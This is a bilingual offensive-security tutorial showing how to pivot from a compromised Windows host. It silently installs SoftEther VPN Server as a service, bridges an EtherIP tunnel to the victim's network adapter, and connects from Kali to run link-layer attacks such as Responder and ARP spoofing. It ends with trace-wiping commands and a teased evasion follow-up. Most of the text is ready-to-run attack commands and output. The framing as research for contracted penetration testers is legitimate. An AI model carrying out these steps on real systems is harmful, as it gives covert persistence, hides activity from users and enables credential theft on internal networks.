Pivoting against Windows is a fairly complex post-exploitation process. In this article I will demonstrate my new method of link layer pivoting using SoftEther and without a virtual machine
针对 Windows 进行转向是一个相当复杂的开发后过程。在本文中，我将演示使用 SoftEther 且无需虚拟机的链路层透视新方法

Caster - Witchhammer

Genre: Offensive, Experimental
Subgenre: Pivoting
Label: exploit.org
Release Date: 25 March 2024

Disclaimer 免責聲明

The article is of an introductory nature and is intended for security professionals conducting testing under contract. The author and editorial staff are not liable for any harm caused by the use of the information presented. The distribution of malware, disruption of systems, and violation of correspondence secrecy will be prosecuted.
本文是介绍性的，适用于根据合同进行测试的安全专业人员。作者和编辑人员对因使用所提供信息而造成的任何损害概不负责。恶意软件的传播、系统中断和违反通信保密的行为将被起诉。

Intro 介绍

Pivoting – is a post-exploitation process in which an attacker attempts to expand his network presence by bypassing segmentation, interference, and defenses. There is really no idea which pivoting method is the best. It all depends on the individual characteristics of the network infrastructure.
Pivoting – 是一种利用后过程，攻击者试图通过绕过分段、干扰和防御来扩展其网络存在。真的不知道哪种枢轴方法是最好的。这完全取决于网络基础设施的各个特性。
In my research, I am going to talk about tunnel pivoting, where an attacker can build an L2 tunnel between themselves and the compromised Windows machine. The L2 tunnel presents link-layer attack possibilities for the attacker. (ARP Spoofing, LLMNR/NBT-NS Poisoning, etc)
在我的研究中，我将讨论隧道透视，攻击者可以在他们自己和受感染的 Windows 计算机之间构建 L2 隧道。L2 隧道为攻击者提供了链路层攻击的可能性。（ARP欺骗、LLMNR/NBT-NS中毒等）

The article will only emphasize on practice, everything is to the point without unnecessary words.
文章只会强调实践，一切都切中要害，没有多余的话。

Concept 概念

My idea is to use SoftEther. This solution is the ability to create VPN networks to build infrastructures. I chose it because:
我的想法是使用SoftEther。该解决方案是创建 VPN 网络以构建基础设施的能力。我之所以选择它，是因为：

• Free open-source, cross-platform
  免费开源、跨平台
• Supports the necessary tunneling protocols to create Ethernet tunnels
  支持创建以太网隧道所需的隧道协议
• Does not require rebooting, shutting down Firewall
  不需要重新启动，关闭防火墙
• There is no problem with AV, as SoftEther is legitimate software
  AV 没有问题，因为 SoftEther 是合法软件

The concept is to install SoftEther on Windows in silent mode using the command line. I will demonstrate this particular scenario because not everyone has access to the GUI during the pentest. With SoftEther, we will turn a compromised Windows machine into a VPN server that supports Ethernet tunnels.
这个概念是使用命令行在 Windows 上以静默模式安装 SoftEther。我将演示这个特殊场景，因为在渗透测试期间，不是每个人都可以访问 GUI。借助 SoftEther，我们将把受感染的 Windows 机器变成支持以太网隧道的 VPN 服务器。

It should be borne in mind that this vector of post-exploitation will require administrator rights. Since you will have to install software, you will have to work with interfaces and bridges.
应该记住，这种利用后向量将需要管理员权限。由于您必须安装软件，因此必须使用接口和网桥。

EtherIP Protocol EtherIP 协议

The skeleton for this pivoting will be the EtherIP protocol. According to RFC 3378, it is capable of transmitting Ethernet frames over IP networks. Just what we need. You might think that Wireguard would do the job, but it is an L3 protocol and cannot transmit Ethernet frames. It is important to understand which protocol is designed to work with L2 and which protocol is designed to work with L3
这种透视的框架将是 EtherIP 协议。根据 RFC 3378，它能够通过 IP 网络传输以太网帧。正是我们需要的。您可能认为 Wireguard 可以完成这项工作，但它是一种 L3 协议，无法传输以太网帧。重要的是要了解哪个协议设计用于 L2，哪个协议设计用于 L3

EtherIP will encapsulate the Ethernet header into an IP header. Here is an example of such an encapsulated packet.
EtherIP 会将以太网报头封装到 IP 报头中。下面是此类封装数据包的示例。

Scenario 场景

The scenario will be like this. The attacker is on the network 192.168.54.0/24, the compromised Windows host is on the network 192.168.0.0/24. The attacker’s task is to gain access to the network 192.168.0.0/24 at the L2 layer using an EtherIP tunnel to conduct link-layer attacks. An EtherIP tunnel will be installed between Kali Linux and Windows.
场景将是这样的。攻击者在网络 192.168.54.0/24 上，被入侵的Windows主机在网络 192.168.0.0/24 上。攻击者的任务是使用 EtherIP 隧道访问 L2 层的网络 192.168.0.0/24 ，以进行链路层攻击。Kali Linux 和 Windows 之间将安装一个 EtherIP 隧道。

The attacker’s machine will be Kali Linux 2023.4, on which the SoftEther Client will be installed, Windows 10 Enterprise LTSC x64 will act as the compromised host, SoftEther Server will be installed on the host.
攻击者的机器 Kali Linux 2023.4 将安装 Windows 10 Enterprise LTSC x64 SoftEther 客户端，将充当受感染的主机，主机上将安装 SoftEther 服务器。

The attacker has access to the compromised machine only through cmd, there is no GUI.
攻击者只能通过 cmd 访问受感染的计算机，没有 GUI。

Warning 警告

This post-exploitation vector will only work against real Windows machines. There may be traffic flow problems with virtual Windows machines, as they may not have promiscuous mode on their interfaces
此开发后向量仅适用于真正的 Windows 计算机。虚拟 Windows 计算机可能存在流量问题，因为它们的接口上可能没有混杂模式

The beginning of post-exploitation
后开发开始

You need to install SoftEther on Windows. The installer has problems with installation in silent mode, so you will need to install SoftEther VPN Server installer somewhere on your test Windows, then copy the whole “SoftEther VPN Server” folder, pack it into an archive. Then when you transfer this archive over the network to the compromised host, you will be able to unpack it and install SoftEther
您需要在 Windows 上安装 SoftEther。安装程序在静默模式下安装时存在问题，因此您需要在测试 Windows 上的某个位置安装 SoftEther VPN Server 安装程序，然后复制整个“SoftEther VPN Server”文件夹，将其打包到存档中。然后，当您通过网络将此存档传输到受感染的主机时，您将能够解压缩它并安装 SoftEther

You moved the archive to the target. It needs to be unzipped.
您已将存档移动到目标。它需要解压缩。

C:\witchhammer>tar -xf softether.zip
C:\witchhammer>cd "SoftEther VPN Server"

Responsible Moment. It is necessary to install the sevpnserver service for correct operation of the server functionality. This is done with a single command with the /install parameter, and no windows will pop up on the user’s side about the installation of this service.
负责任的时刻。必须安装 sevpnserver 服务才能正确操作服务器功能。这是通过带有 /install 参数的单个命令完成的，并且用户端不会弹出有关此服务安装的窗口。

C:\witchhammer\SoftEther VPN Server>vpnserver_x64.exe /install

Verify the installation and check the status of the service. After installation, it will start automatically
验证安装并检查服务的状态。安装后，它会自动启动

C:\witchhammer\SoftEther VPN Server>sc query sevpnserver

SERVICE_NAME: sevpnserver
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 4  RUNNING
                                (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0

Now after installing the service, you need to configure the server.
现在，安装服务后，您需要配置服务器。

C:\witchhammer\SoftEther VPN Server>vpncmd_x64.exe

After running vpncmd_x64.exe, select “1” to configure the server specifically
运行 vpncmd_x64.exe 后，选择“1”以专门配置服务器

vpncmd command - SoftEther VPN Command Line Management Utility
SoftEther VPN Command Line Management Utility (vpncmd command)
Version 4.43 Build 9799   (English)
Compiled 2023/08/31 10:50:49 by buildsan at crosswin with OpenSSL 3.0.9
Copyright (c) 2012-2023 SoftEther VPN Project. All Rights Reserved.

By using vpncmd program, the following can be achieved.

1. Management of VPN Server or VPN Bridge
2. Management of VPN Client
3. Use of VPN Tools (certificate creation and Network Traffic Speed Test Tool)

Select 1, 2 or 3: 1

You need to create a password for server management, delete the default hub, create your own and set up a password for it
您需要为服务器管理创建密码，删除默认中心，创建自己的密码并为其设置密码

VPN Server> ServerPasswordSet password
VPN Server> HubDelete DEFAULT
VPN Server> HubCreate Witchhammer /PASSWORD:password

Now you need to go to the hub settings, create a tunnel and a bridge. L2TP, L2TPRAW should also be rejected. And specify the PSK key.
现在您需要转到集线器设置，创建隧道和网桥。L2TP，L2TPRAW也应该被拒绝。并指定 PSK 密钥。

/ETHERIP:yes is a key parameter. It will indicate the use of EtherIP to create an L2 tunnel
/ETHERIP:yes 是一个关键参数。它将指示使用 EtherIP 创建 L2 隧道

VPN Server> Hub Witchhammer
VPN Server/Witchhammer> IPSecEnable /L2TP:no /L2TPRAW:no /ETHERIP:yes /DEFAULTHUB:Witchhammer /PSK:password

Come up with passwords for configurations yourself
自己想出配置的密码

Then you need to create a bridge. Before creating a bridge, you need to know the full name of the physical interface of the compromised machine. In my case, this is:
然后你需要创建一个桥。在创建网桥之前，您需要知道受感染计算机的物理接口的全名。就我而言，这是：

VPN Server>BridgeDeviceList
BridgeDeviceList command - Get List of Network Adapters Usable as Local Bridge
Intel(R) 82574L Gigabit Network Connection (ID=0587757899)
The command completed successfully.

Intel(R) 82574L Gigabit Network Connection (ID=0587757899)

Creating a bridge with the /TAP:yes option. Please note that the first argument to the BridgeCreate command will be the name of the previously created hub
使用该 /TAP:yes 选项创建桥接。请注意，该 BridgeCreate 命令的第一个参数将是先前创建的中心的名称

VPN Server>BridgeCreate Witchhammer /DEVICE:"Intel(R) 82574L Gigabit Network Connection (ID=0587757899)" /TAP:yes

Finally, you need to create a user so that an attacker can use it to authenticate to the server and launch a tunnel.
最后，您需要创建一个用户，以便攻击者可以使用它来向服务器进行身份验证并启动隧道。

VPN Server/Witchhammer>UserCreate caster /GROUP:none /REALNAME:none /NOTE:none
VPN Server/Witchhammer>UserPasswordSet caster /PASSWORD:password

The user creation is done in the hub settings
用户创建是在中心设置中完成的

This is the end of all server-side settings. However, there are a couple more nuances:
这是所有服务器端设置的结束。但是，还有一些细微差别：

• Make sure that the Routing and Remote Access service is active, it is responsible for routing
  确保 Routing and Remote Access 服务处于活动状态，它负责路由
• Make sure that the TCP/443 port is not filtered by the firewall, it must be open from the outside so that the attacker can connect to the server to create tunnel.
  确保 TCP/443 端口没有被防火墙过滤，它必须从外部打开，以便攻击者可以连接到服务器以创建隧道。

Beginning of the attack 攻击的开始

On his Kali, the attacker must download and install SoftEther VPN Client. From the official site it is enough to download tar.gz archive, unzip it and build the necessary files vpnclient and vpncmd
在他的 Kali 上，攻击者必须下载并安装 SoftEther VPN 客户端。从官方网站下载 tar.gz 存档、解压缩并构建必要的文件 vpnclient 和 vpncmd

caster@kali:~$ sudo apt install build-essential
caster@kali:~$ wget https://www.softether-download.com/files/softether/v4.43-9799-beta-2023.08.31-tree/Linux/SoftEther_VPN_Client/64bit_-_Intel_x64_or_AMD64/softether-vpnclient-v4.43-9799-beta-2023.08.31-linux-x64-64bit.tar.gz
caster@kali:~$ gunzip softether-vpnclient-v4.43-9799-beta-2023.08.31-linux-x64-64bit.tar.gz
caster@kali:~$ tar xf softether-vpnclient-v4.43-9799-beta-2023.08.31-linux-x64-64bit.tar
caster@kali:~$ cd vpnclient
caster@kali:~/vpnclient$ make

Before starting the tunnel, you must create a /32 route to the compromised machine, otherwise the tunnel may break when receiving an address on the virtual adapter
在启动隧道之前，必须创建到受感染计算机的 /32 路由，否则在虚拟适配器上接收地址时，隧道可能会中断

caster@kali:~$ sudo route add -net 192.168.0.183 netmask 255.255.255.255 gw 192.168.54.1

Start the vpnclient service and go to the console to configure the client
启动 vpnclient 服务，进入控制台配置客户端

caster@kali:~/vpnclient$ sudo ./vpnclient start

caster@kali:~/vpnclient$ sudo ./vpncmd         
vpncmd command - SoftEther VPN Command Line Management Utility
SoftEther VPN Command Line Management Utility (vpncmd command)
Version 4.43 Build 9799   (English)
Compiled 2023/08/31 10:50:49 by buildsan at crosswin with OpenSSL 3.0.9
Copyright (c) 2012-2023 SoftEther VPN Project. All Rights Reserved.

By using vpncmd program, the following can be achieved. 

1. Management of VPN Server or VPN Bridge 
2. Management of VPN Client
3. Use of VPN Tools (certificate creation and Network Traffic Speed Test Tool)

Select 1, 2 or 3: 2

Specify the host name or IP address of the computer that the destination VPN Client is operating on. 
If nothing is input and Enter is pressed, connection will be made to localhost (this computer).
Hostname of IP Address of Destination: localhost

Connected to VPN Client "localhost".

VPN Client>

Create a virtual adapter
创建虚拟适配器

VPN Client> NicCreate caster

Now create the connection configuration, specify the server address, remote hub, and the name of the created adapter. Note, the server address is the address of the compromised machine where the server was configured.
现在创建连接配置，指定服务器地址、远程集线器和所创建适配器的名称。请注意，服务器地址是配置服务器的受感染计算机的地址。

VPN Client> AccountCreate Tunnel /SERVER:192.168.0.183:443 /HUB:Witchhammer /USERNAME:caster /NICNAME:caster

Specify the password and authentication type, it is standard
指定密码和身份验证类型，这是标准的

VPN Client> AccountPassword Tunnel /PASSWORD:password /TYPE:standard

And finally connecting to the server
最后连接到服务器

VPN Client> AccountConnect Tunnel

To check the connection status
检查连接状态

VPN Client>AccountStatusGet Tunnel
AccountStatusGet command - Get Current VPN Connection Setting Status
Item                                      |Value
------------------------------------------+--------------------------------------------------------
VPN Connection Setting Name               |Tunnel
Session Status                            |Connection Completed (Session Established)
VLAN ID                                   |-
Server Name                               |192.168.0.183
Port Number                               |TCP Port 443
Server Product Name                       |SoftEther VPN Server (64 bit)
Server Version                            |4.43
Server Build                              |Build 9799
Connection Started at                     |2024-03-25 (Mon) 06:25:27
First Session has been Established since  |2024-03-25 (Mon) 06:25:28
Current Session has been Established since|2024-03-25 (Mon) 06:25:28
Number of Established Sessions            |1 Times
Half Duplex TCP Connection Mode           |No (Full Duplex Mode)
VoIP / QoS Function                       |Enabled
Number of TCP Connections                 |2
Maximum Number of TCP Connections         |2
Encryption                                |Enabled (Algorithm: TLS_AES_256_GCM_SHA384)
Use of Compression                        |No (No Compression)
Physical Underlay Protocol                |Standard TCP/IP (IPv4)
                                          |IPv4 UDPAccel_Ver=2 ChachaPoly_OpenSSL UDPAccel_MSS=1309
UDP Acceleration is Supported             |Yes
UDP Acceleration is Active                |No
Session Name                              |SID-CASTER-4
Connection Name                           |CID-17-1CDA4CF82B
Session Key (160 bit)                     |13A093D2121AE90B984595DE8D5ED3539678CF4A
Bridge / Router Mode                      |No
Monitoring Mode                           |No
Outgoing Data Size                        |1,218 bytes
Incoming Data Size                        |819 bytes
Outgoing Unicast Packets                  |1 packets
Outgoing Unicast Total Size               |42 bytes
Outgoing Broadcast Packets                |8 packets
Outgoing Broadcast Total Size             |656 bytes
Incoming Unicast Packets                  |0 packets
Incoming Unicast Total Size               |0 bytes
Incoming Broadcast Packets                |1 packets
Incoming Broadcast Total Size             |60 bytes
The command completed successfully.

TLS

Traffic at the time of connection to the server. Here we see the presence of TLS. That’s great! L2 traffic will be encapsulated in TLS, giving the tunnel security and reducing the likelihood that the attacker will be compromised.
连接到服务器时的流量。在这里，我们看到TLS的存在。真棒！L2 流量将被封装在 TLS 中，从而为隧道提供安全性并降低攻击者受到威胁的可能性。

Network Attacks 网络攻击

As a result of all manipulations we have created a virtual TAP interface vpn_caster. It does not have an address yet, but you can get it automatically using DHCP.
作为所有操作的结果，我们创建了一个虚拟TAP接口 vpn_caster 。它还没有地址，但您可以使用DHCP自动获取它。

caster@kali:~$ sudo dhclient -v vpn_caster

However, it is worth remembering that new default gateway information may arrive via DHCP, a new 0.0.0.0 route may affect connectivity. Therefore, if this route arrives, it should be deleted
但是，值得记住的是，新的默认网关信息可能会通过 DHCP 到达，新 0.0.0.0 路由可能会影响连接。因此，如果此路由到达，则应将其删除

caster@kali:~$ sudo route del default

Proof of Concept 概念验证

The attacker can now perform link layer attacks. You can launch Responder.
攻击者现在可以执行链路层攻击。您可以启动 Responder。

You can also perform other attacks, ARP Scanning, etc
您还可以执行其他攻击，ARP扫描等

A concept from my notebook
我笔记本上的一个概念

Detection 检波

This vector can be detected. Software installation on endpoints can be tracked, as can DNS requests and TLS packets
可以检测到这种载体。可以跟踪端点上的软件安装，也可以跟踪 DNS 请求和 TLS 数据包

Cleanup 清理

When you need to wipe the traces, you need to stop the sevpnserver service, delete SoftEther itself and the folder.
当需要擦除痕迹时，需要停止 sevpnserver 服务，删除SoftEther本身和文件夹。

C:\witchhammer\SoftEther VPN Server>sc stop sevpnserver

SERVICE_NAME: sevpnserver
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 3  STOP_PENDING
                                (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x186a0

C:\witchhammer\SoftEther VPN Server>vpnserver_x64.exe /uninstall

C:\>rmdir /s /q c:\witchhammer

Outro 尾声

In this article, I demonstrated my research showing a new way to post-exploitation Windows using Ethernet tunnels.
在本文中，我展示了我的研究，展示了一种使用以太网隧道开发 Windows 的新方法。
This method is extremely exotic, but I have proven its practicality and it works great.
这种方法非常奇特，但我已经证明了它的实用性，而且效果很好。

Perhaps I’ll release a VIP version of this paper in which I break down detection evasion techniques.
也许我会发布这篇论文的VIP版本，其中我分解了检测规避技术。